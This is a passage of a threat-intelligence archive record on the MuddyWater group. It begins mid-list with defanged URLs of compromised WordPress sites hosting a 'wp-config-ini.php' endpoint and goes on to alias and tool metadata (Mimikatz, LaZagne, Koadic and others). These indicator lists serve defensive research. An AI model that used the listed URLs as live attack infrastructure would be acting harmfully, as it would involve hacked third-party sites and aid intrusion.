oken-arrow[.]co.za//wp-config-ini.php\r\nhxxp://aboutbodybuildingworkout[.]com//wp-config-ini.php\r\nhxxp://www.goolinespace[.]com//wp-config-ini.php\r\nhxxp://aqarco[.]com/wp-admin/wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 17 of 18\n\nhxxp://www.braidhairextensions[.]com//wp-config-ini.php\r\nhxxp://www.bhakkarrishtey[.]com//wp-config-ini.php\r\nhxxp://bestencouragementwords[.]com//wp-config-ini.php\r\nhxxp://agricolavicuna.cl//wp-config-ini.php\r\nhxxp://badlaretinaclinic[.]com/tmp/wp-config-ini.php\r\nhxxp://get-paid-for-online-survey[.]com//wp-config-ini.php\r\nhxxp://firstchoiceproperties[.]co.za//wp-config-ini.php\r\nhxxp://habibtextiles.pk//wp-config-ini.php\r\nhxxp://blueberrygroup[.]com.ar//wp-config-ini.php\r\nhxxp://abrahamseed[.]co.za//wp-config-ini.php\r\nhxxp://betandbeer.tips//wp-config-ini.php\r\nhxxp://molepetravel[.]co.ls//wp-config-ini.php\r\nhxxp://iiee.edu.pk//wp-config-ini.php\r\nhxxp://bella-yfaceandbodyproduct[.]com//wp-config-ini.php\r\nhxxp://www.algom-law[.]com//wp-config-ini.php\r\nhxxp://thelawyerscanvas.pk//wp-config-ini.php\r\nhxxp://satuwrite[.]com//wp-config-ini.php\r\nhxxp://bazinga-shop.eu//wp-config-ini.php\r\nhxxps://www.biosetinlabs[.]com/wp-admin/wp-config-ini.php\r\nSource: https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html" ], "report_names": [ "clearing-muddywater-analysis-of-new.html" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434139, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3ba6037dd03e2b92eae5ec5b7818723d13db4a5e.pdf", "text": "https://archive.orkl.eu/3ba6037dd03e2b92eae5ec5b7818723d13db4a5e.txt", "img": "https://archive.orkl.eu/3ba6037dd03e2b92eae5ec5b7818723d13db4a5e.jpg" } }